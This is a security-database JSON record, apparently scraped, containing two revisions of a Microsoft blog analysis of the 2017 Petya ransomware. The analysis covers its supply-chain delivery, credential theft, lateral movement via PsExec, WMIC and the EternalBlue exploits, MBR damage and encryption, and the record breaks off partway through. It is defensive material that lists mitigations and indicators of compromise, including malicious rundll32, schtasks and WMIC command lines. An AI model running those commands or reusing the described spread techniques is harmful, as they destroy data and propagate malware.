["KITPLOIT:9146046356497464176"]}, {"type": "mmpc", "idList": ["MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:4A6B394DCAF12E05136AE087248E228C"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:EA407B51944632C248FEB495594123EA", "THN:E18080D17705880B2E7B69B8AB125EA9", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:42030"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "avleonov", "idList": ["AVLEONOV:98069D08913ADA26D85B10C827D3FE97", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"]}, {"type": "fireeye", "idList": ["FIREEYE:57B0F10A16E18DC672833B1812005B76", "FIREEYE:399092589F455855881447C60B56C21A"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2017-09-08T08:23:33", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2017-09-08T08:23:33", "rev": 2}}, "reporter": "msft-mmpc", "bulletinFamily": "blog", "objectVersion": "1.5", "type": "mmpc", "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hash": "1cf516ac3e00e25e95ec06f7851b84aee0ebfd26bc63237addd184b10fb76ba3", "hashmap": [{"key": "bulletinFamily", "hash": "126ac9f6149081eb0e97c2e939eaad52"}, {"key": "cvelist", "hash": "2ed33d64012a372c3bd45d454ea4fb3b"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "9eea897e5b35094c8bed9578fb2d92a2"}, {"key": "href", "hash": "7c7b135cc6d4ac94a96416aa570dd63d"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "be27874259dfa96aff4b2c923f582319"}, {"key": "published", "hash": "be27874259dfa96aff4b2c923f582319"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9158c03164fb6db0c440fdb287e68855"}, {"key": "title", "hash": "3791d2f219ef1795e98280aa7ad719e4"}, {"key": "type", "hash": "2206031ddfa442c2eb57dd17e9fcf174"}], "scheme": null}, {"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "history": [{"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "_(Note: We have published a follow-up blog entry on this ransomware attack. We have new findings from our continued investigation, as well as platform mitigation and protection information: [Windows 10 platform resilience against the Petya ransomware attack](<https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/>).)_\n\n \n\nOn June 27, 2017 reports of a [ransomware](<https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>) infection began spreading across Europe. We saw the first infections in Ukraine, where more than 12,500 machines encountered the threat. We then observed infections in another 64 countries, including Belgium, Brazil, Germany, Russia, and the United States.\n\nThe new ransomware has worm capabilities, which allows it to move laterally across infected networks. Based on our investigation, this new ransomware shares similar codes and is a new variant of [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Petya>). This new strain of ransomware, however, is more sophisticated.\n\nTo protect our customers, we released cloud-delivered protection updates and made updates to our signature definition packages shortly after. These updates were automatically delivered to all Microsoft free antimalware products, including [Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) and Microsoft Security Essentials. You can download the latest version of these files manually at the [Malware Protection Center](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) automatically detects behaviors used by this new ransomware variant without any updates.\n\n## Delivery and installation\n\nInitial infection appears to involve a software supply-chain threat involving the Ukrainian company M.E.Doc, which develops tax accounting software, MEDoc. Although this vector was speculated at length by news media and security researchers\u2014including Ukraine\u2019s own Cyber Police\u2014there was only circumstantial evidence for this vector. Microsoft now has evidence that a few active infections of the ransomware initially started from the legitimate MEDoc updater process. As we highlighted previously, [software supply chain attacks](<https://blogs.technet.microsoft.com/mmpc/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/>) are a recent dangerous trend with attackers, and it requires advanced defense.\n\nWe observed telemetry showing the MEDoc software updater process (_EzVit.exe)_ executing a malicious command-line matching this exact attack pattern on Tuesday, June 27 around 10:30 a.m. GMT.\n\nThe execution chain leading to the ransomware installation is represented in the diagram below and essentially confirms that_ EzVit.exe_ process from MEDoc, for unknown reasons, at some moment executed the following command-line:\n\n_C:\\\\\\Windows\\\\\\system32\\\\\\rundll32.exe\\\" \\\"C:\\\\\\ProgramData\\\\\\perfc.dat\\\",#1 30_\n\n\n\nThe same update vector was also mentioned by the Ukraine Cyber Police in a public list of indicators of compromise (IOCs) , which includes the MEDoc updater.\n\n## A single ransomware, multiple lateral movement techniques\n\nGiven this new ransomware's added lateral movement capabilities it only takes a single infected machine to affect a network. The ransomware spreading functionality is composed of multiple methods responsible for:\n\n * stealing credentials or re-using existing active sessions\n * using file-shares to transfer the malicious file across machines on the same network\n * using existing legitimate functionalities to execute the payload or abusing SMB vulnerabilities for unpatched machines\n\nIn the next sections, we discuss the details of each technique.\n\n## Lateral movement using credential theft and impersonation\n\nThis ransomware drops a credential dumping tool (typically as a .tmp file in the _%Temp%_ folder) that shares code similarities with [Mimikatz](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=HackTool:Win32/Mimikatz>) and comes in 32-bit and 64-bit variants. Because users frequently log in using accounts with local admin privileges and have active sessions opens across multiple machines, stolen credentials are likely to provide the same level of access the user has on other machines.\n\nOnce the ransomware has valid credentials, it scans the local network to establish valid connections on ports _tcp/139_ and _tcp/445_. A special behavior is reserved for Domain Controllers or servers: this ransomware attempts to call _DhcpEnumSubnets()_ to enumerate DHCP subnets; for each subnet, it gathers all hosts/clients (using _DhcpEnumSubnetClients()_) for scanning for _tcp/139_ and _tcp/445_ services. If it gets a response, the malware attempts to copy a binary on the remote machine using regular file-transfer functionalities with the stolen credentials.\n\nIt then tries to execute remotely the malware using either PSEXEC or WMIC tools.\n\nThe ransomware attempts to drop the legitimate _psexec.exe_ (typically renamed to _dllhost.dat_) from an embedded resource within the malware. It then scans the local network for _admin$_ shares, copies itself across the network, and executes the newly copied malware binary remotely using PSEXEC.\n\nIn addition to credential dumping, the malware also tries to steal credentials by using the _CredEnumerateW_ function to get all the other user credentials potentially stored on the credential store. If a credential name starts with _\"TERMSRV/\"_ and the type is set as 1 (generic) it uses that credential to propagate through the network.\n\n\n\n_Ransomware code responsible for accessing \\\\\\Admin$ shares on different machines_\n\nThis ransomware also uses the Windows Management Instrumentation Command-line (WMIC) to find remote shares (using _NetEnum/NetAdd_) to spread to. It uses either a duplicate token of the current user (for existing connections), or a username/password combination (spreading through legit tools).\n\n\n\n_Screenshot showing launch of malware on a remote machine using WMIC_\n\n## Lateral movement using EternalBlue and EternalRomance\n\nThe new ransomware can also spread using an exploit for the Server Message Block (SMB) vulnerability [CVE-2017-0144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>) (also known as EternalBlue), which was fixed in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) and was also exploited by [WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>) to spread to out-of-date machines. In addition, this ransomware also uses a second exploit for [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) (also known as EternalRomance, and fixed by the same bulletin).\n\nWe\u2019ve seen this ransomware attempt to use these exploits by generating SMBv1 packets (which are all _XOR 0xCC_ encrypted) to trigger these vulnerabilities at the following address of the malware code:\n\n\n\n\n\nThese two exploits were leaked by a group called [Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>). However, it is important to note that both of these vulnerabilities have been fixed by Microsoft in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) on March 14, 2017.\n\nMachines that are patched against these exploits (with [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) or [have disabled SMBv1](<https://support.microsoft.com/kb/2696547>) are not affected by this particular spreading mechanism. Please refer to our previous [blog](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) for details on these exploits and how modern Windows 10 mitigations can help to contain similar threats.\n\n## Encryption\n\nThis ransomware\u2019s encryption behavior depends on the malware process privilege level and the processes found to be running on the machine. It does this by employing a simple XOR-based hashing algorithm on the process names, and checks against the following hash values to use as a behavior exclusion:\n\n\n\n * _0x6403527E_ or _0x651B3005_ \u2013 if these hashes of process names are found running on the machine, then the ransomware does not do SMB exploitation.\n\n\n\n * _0x2E214B44 _ \u2013 if a process with this hashed name is found, the ransomware trashes the first 10 sectors of _\\\\\\\\\\\\\\\\.\\\\\\PhysicalDrive0_, including the MBR\n\n\n\nThis ransomware then writes to the master boot record (MBR) and then sets up the system to reboot. It sets up scheduled tasks to shut down the machine after at least 10 minutes past the current time. The exact time is random _(GetTickCount())_. For example:\n\n_schtasks /Create /SC once /TN \"\" /TR \"&lt;system folder&gt;\\shutdown.exe /r /f\" /ST 14:23_\n\nAfter successfully modifying the MBR, it displays the following fake system message, which notes a supposed error in the drive and shows the fake integrity checking:\n\n\n\nIt then displays this ransom note:\n\n\n\nOnly if the malware is running with highest privilege (i.e., with _SeDebugPrivilege_ enabled), it tries to overwrite the MBR code.\n\nThis ransomware attempts to encrypt all files with the following file name extensions in all folders in all fixed drives, except for _C:\\Windows_:\n\n.3ds | .7z | .accdb | .ai \n---|---|---|--- \n.asp | .aspx | .avhd | .back \n.bak | .c | .cfg | .conf \n.cpp | .cs | .ctl | .dbf \n.disk | .djvu | .doc | .docx \n.dwg | .eml | .fdb | .gz \n.h | .hdd | .kdbx | .mail \n.mdb | .msg | .nrg | .ora \n.ost | .ova | .ovf | .pdf \n.php | .pmf | .ppt | .pptx \n.pst | .pvi | .py | .pyc \n.rar | .rtf | .sln | .sql \n.tar | .vbox | .vbs | .vcb \n.vdi | .vfd | .vmc | .vmdk \n.vmsd | .vmx | .vsdx | .vsv \n.work | .xls | .xlsx | .xvd \n.zip | | | \n \nIt uses file mapping APIs instead of a usual _ReadFile()_/_WriteFile()_ APIs:\n\n\n\nUnlike most other ransomware, this threat does not append a new file name extension to encrypted files. Instead, it overwrites the said files.\n\nThe AES key generated for encryption is per machine, per fixed drive, and gets exported and encrypted using the embedded 2048-bit RSA public key of the attacker.\n\n\n\n_Embedded RSA public key_\n\n\n\n_Code exporting the AES 128 bit key per machine, per fixed drive in the machine and encrypting it using embedded RSA public key during export_\n\nThe unique key used for files encryption (AES) is added, in encrypted form, to the _README.TXT_ file the threat writes under section _\"Your personal installation key:\"_.\n\nBeyond encrypting files, this ransomware also attempts to infect the MBR or destroy certain sectors of VBR and MBR:\n\n\n\nAfter completing its encryption routine, this ransomware drops a text file called _README.TXT_ in each fixed drive. The said file has the following text:\n\n\n\nThis ransomware also clears the System, Setup, Security, Application event logs and deletes NTFS journal info.\n\n## Detection and investigation with Windows Defender Advanced Threat Protection\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) is a post-breach solution and offers by-design detections for this attack without need of any signature updates. Windows Defender ATP sensors constantly monitor and collect telemetry from the endpoints and offers machine-learning detections for common lateral movement techniques and tools used by this ransomware, including, for example, the execution of _PsExec.exe_ with different filename, and the creation of the _perfc.dat_ file in remote shares (UNC) paths.\n\nToday, without the need of additional updates, an infected machine may look like this:\n\n\n\nThe second alert targets the distribution of the ransomware\u2019s .dll file over the network. This event provides helpful information during investigation as it includes the User context that was used to move the file remotely. This user has been compromised and could represent the user associated with patient-zero:\n\n\n\nWith Windows Defender ATP, enterprise customers are well-equipped to quickly identify Petya outbreaks, investigate the scope of the attack, and respond early to malware delivery campaigns.\n\n## Protection against this new ransomware attack\n\nKeeping your [Windows 10](<https://www.microsoft.com/en-us/windows/windows-10-upgrade>) [up-to-date](<https://support.microsoft.com/en-us/help/311047/how-to-keep-your-windows-computer-up-to-date>) gives you the benefits of the latest features and proactive mitigations built into the latest versions of Windows. In Creators Update, we further [hardened Windows 10 against ransomware attacks](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>) by introducing new next-gen technologies and enhancing existing ones.\n\nAs another layer of protection, [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>) only allows apps that come from the Windows Store to run. Windows 10 S users are further protected from this threat.\n\nWe recommend customers that have not yet installed security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) to do so as soon as possible. Until you can apply the patch, we also recommend two possible workarounds to reduce the attack surface:\n\n * Disable SMBv1 with the steps documented at [Microsoft Knowledge Base Article 2696547](<https://support.microsoft.com/kb/2696547>) and as [recommended previously](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>)\n * Consider adding a rule on your router or firewall to block incoming SMB traffic on port 445\n\nAs the threat targets ports 139 and 445, you customers can block any traffic on those ports to prevent propagation either into or out of machines in the network. You can also disable remote WMI and file sharing. These may have large impacts on the capability of your network, but may be suggested for a very short time period while you assess the impact and [apply definition updates](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\nAside from exploiting vulnerabilities, this threat can also spread across networks by stealing credentials, which it then uses to attempt to copy and execute a copy on remote machines. You can prevent credential theft by ensuring credential hygiene across the organization. [Secure privileged access](<https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access>) to prevent the spread of threats like Petya and to protect your organization\u2019s assets. Use [Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) to protect domain credentials stored in the Windows Credential Store.\n\nWindows Defender Antivirus detects this threat as [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/entry.aspx?Name=Ransom:Win32/Petya>) as of the [1.247.197.0 update](<https://www.microsoft.com/security/portal/definitions/adl.aspx>). Windows Defender Antivirus uses cloud-based protection, helping to protect you from the latest threats.\n\nFor enterprises, use [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>) to lock down devices and provide kernel-level virtualization-based security, allowing only trusted applications to run, effectively preventing malware from running.\n\nMonitor networks with [Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), which alerts security operations teams about suspicious activities. Download this playbook to see how you can leverage Windows Defender ATP to detect, investigate, and mitigate ransomware in networks: [Windows Defender Advanced Threat Protection \u2013 Ransomware response playbook](<https://www.microsoft.com/en-us/download/details.aspx?id=55090>).\n\n## Resources\n\nMSRC blog: <https://blogs.technet.microsoft.com/msrc/2017/06/28/update-on-petya-malware-attacks/>\n\nNext-generation ransomware protection with Windows 10 Creators Update: <https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>\n\nDownload English language security updates: [Windows Server 2003 SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows Server 2003 SP2 x86,](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-enu_f617caf6e7ee6f43abe4b386cb1d26b3318693cf.exe>) [Windows XP SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows XP SP3 x86](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe>), [Windows XP Embedded SP3 x86](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-embedded-custom-enu_8f2c266f83a7e1b100ddb9acd4a6a3ab5ecd4059.exe>), [Windows 8 x86,](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x86_a0f1c953a24dd042acc540c59b339f55fb18f594.msu>) [Windows 8 x64](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x64_f05841d2e94197c2dca4457f1b895e8f632b7f8e.msu>)\n\nDownload localized language security updates: [Windows Server 2003 SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=d3cb7407-3339-452e-8371-79b9c301132e>), [Windows Server 2003 SP2 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=350ec04d-a0ba-4a50-9be3-f900dafeddf9>), [Windows XP SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=5fbaa61b-15ce-49c7-9361-cb5494f9d6aa>), [Windows XP SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=7388c05d-9de6-4c6a-8b21-219df407754f>), [Windows XP Embedded SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=a1db143d-6ad2-4e7e-9e90-2a73316e1add>), [Windows 8 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=6e2de6b7-9e43-4b42-aca2-267f24210340>), [Windows 8 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=b08bb3f1-f156-4e61-8a68-077963bae8c0>)\n\nMS17-010 Security Update: <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>\n\nGeneral information on ransomware: <https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>\n\nSecurity for IT Pros: <https://technet.microsoft.com/en-us/security/default>\n\n## Indicators of Compromise\n\nNetwork defenders may search for the following indicators:\n\n**File indicators**\n\n * 34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d\n * 9717cfdc2d023812dbc84a941674eb23a2a8ef06\n * 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf\n * 56c03d8e43f50568741704aee482704a4f5005ad\n\n**Command lines**\n\nIn environments where command-line logging is available, the following command lines may be searched:\n\n * Scheduled Reboot Task: Petya schedules a reboot for a random time between 10 and 60 minutes from the current time \n * _schtasks /Create /SC once /TN \"\" /TR \"&lt;system folder&gt;\\shutdown.exe /r /f\" /ST &lt;time&gt;_\n * _cmd.exe /c schtasks /RU \"SYSTEM\" /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST &lt;time&gt;_\n\nThis may be surfaced by searching for EventId 106 (General Task Registration) which captures tasks registered with the Task Scheduler service.\n\n * Lateral Movement (Remote WMI) \n * _\"process call create \\\"C:\\\\\\Windows\\\\\\System32\\\\\\rundll32.exe \\\\\\\\\\\"C:\\\\\\Windows\\\\\\perfc.dat\\\\\\\\\\\" #1\u2033_\n\n**Network indicators**\n\nIn environments where NetFlow data are available, this ransomware\u2019s subnet-scanning behavior may be observed by looking for the following:\n\n * Workstations scanning ports tcp/139 and tcp/445 on their own local (/24) network scope\n * Servers (in particular, domain controllers) scanning ports tcp/139 and tcp/445 across multiple /24 scopes\n\n_ _", "enchantments": {}, "history": [], "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/", "id": "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "lastseen": "2017-07-03T16:40:14", "modified": "2017-06-28T06:57:43", "objectVersion": "1.4", "published": "2017-06-28T06:57:43", "references": [], "reporter": "msft-mmpc", "title": "New ransomware, old techniques: Petya adds worm capabilities", "type": "mmpc", "viewCount": 4}, "differentElements": ["description"], "edition": 2, "lastseen": "2017-07-03T16:40:14"}, {"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "description": "_(Note: We have published a follow-up blog entry on this ransomware attack. We have new findings from our continued investigation, as well as platform mitigation and protection information: [Windows 10 platform resilience against the Petya ransomware attack](<https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/>). Read our latest comprehensive report on ransomware: [**Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene**](<https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/>).)_\n\n \n\nOn June 27, 2017 reports of a [ransomware](<https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>) infection began spreading across Europe. We saw the first infections in Ukraine, where more than 12,500 machines encountered the threat. We then observed infections in another 64 countries, including Belgium, Brazil, Germany, Russia, and the United States.\n\nThe new ransomware has worm capabilities, which allows it to move laterally across infected networks. Based on our investigation, this new ransomware shares similar codes and is a new variant of [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Petya>). This new strain of ransomware, however, is more sophisticated.\n\nTo protect our customers, we released cloud-delivered protection updates and made updates to our signature definition packages shortly after. These updates were automatically delivered to all Microsoft free antimalware products, including [Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) and Microsoft Security Essentials. You can download the latest version of these files manually at the [Malware Protection Center](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) automatically detects behaviors used by this new ransomware variant without any updates.\n\n## Delivery and installation\n\nInitial infection appears to involve a software supply-chain threat involving the Ukrainian company M.E.Doc, which develops tax accounting software, MEDoc. Although this vector was speculated at length by news media and security researchers\u2014including Ukraine\u2019s own Cyber Police\u2014there was only circumstantial evidence for this vector. Microsoft now has evidence that a few active infections of the ransomware initially started from the legitimate MEDoc updater process. As we highlighted previously, [software supply chain attacks](<https://blogs.technet.microsoft.com/mmpc/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/>) are a recent dangerous trend with attackers, and it requires advanced defense.\n\nWe observed telemetry showing the MEDoc software updater process (_EzVit.exe)_ executing a malicious command-line matching this exact attack pattern on Tuesday, June 27 around 10:30 a.m. GMT.\n\nThe execution chain leading to the ransomware installation is represented in the diagram below and essentially confirms that_ EzVit.exe_ process from MEDoc, for unknown reasons, at some moment executed the following command-line:\n\n_C:\\\\\\Windows\\\\\\system32\\\\\\rundll32.exe\\\" \\\"C:\\\\\\ProgramData\\\\\\perfc.dat\\\",#1 30_\n\n\n\nThe same update vector was also mentioned by the Ukraine Cyber Police in a public list of indicators of compromise (IOCs) , which includes the MEDoc updater.\n\n## A single ransomware, multiple lateral movement techniques\n\nGiven this new ransomware's added lateral movement capabilities it only takes a single infected machine to affect a network. The ransomware spreading functionality is composed of multiple methods responsible for:\n\n * stealing credentials or re-using existing active sessions\n * using file-shares to transfer the malicious file across machines on the same network\n * using existing legitimate functionalities to execute the payload or abusing SMB vulnerabilities for unpatched machines\n\nIn the next sections, we discuss the details of each technique.\n\n## Lateral movement using credential theft and impersonation\n\nThis ransomware drops a credential dumping tool (typically as a .tmp file in the _%Temp%_ folder) that shares code similarities with [Mimikatz](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=HackTool:Win32/Mimikatz>) and comes in 32-bit and 64-bit variants. Because users frequently log in using accounts with local admin privileges and have active sessions opens across multiple machines, stolen credentials are likely to provide the same level of access the user has on other machines.\n\nOnce the ransomware has valid credentials, it scans the local network to establish valid connections on ports _tcp/139_ and _tcp/445_. A special behavior is reserved for Domain Controllers or servers: this ransomware attempts to call _DhcpEnumSubnets()_ to enumerate DHCP subnets; for each subnet, it gathers all hosts/clients (using _DhcpEnumSubnetClients()_) for scanning for _tcp/139_ and _tcp/445_ services. If it gets a response, the malware attempts to copy a binary on the remote machine using regular file-transfer functionalities with the stolen credentials.\n\nIt then tries to execute remotely the malware using either PSEXEC or WMIC tools.\n\nThe ransomware attempts to drop the legitimate _psexec.exe_ (typically renamed 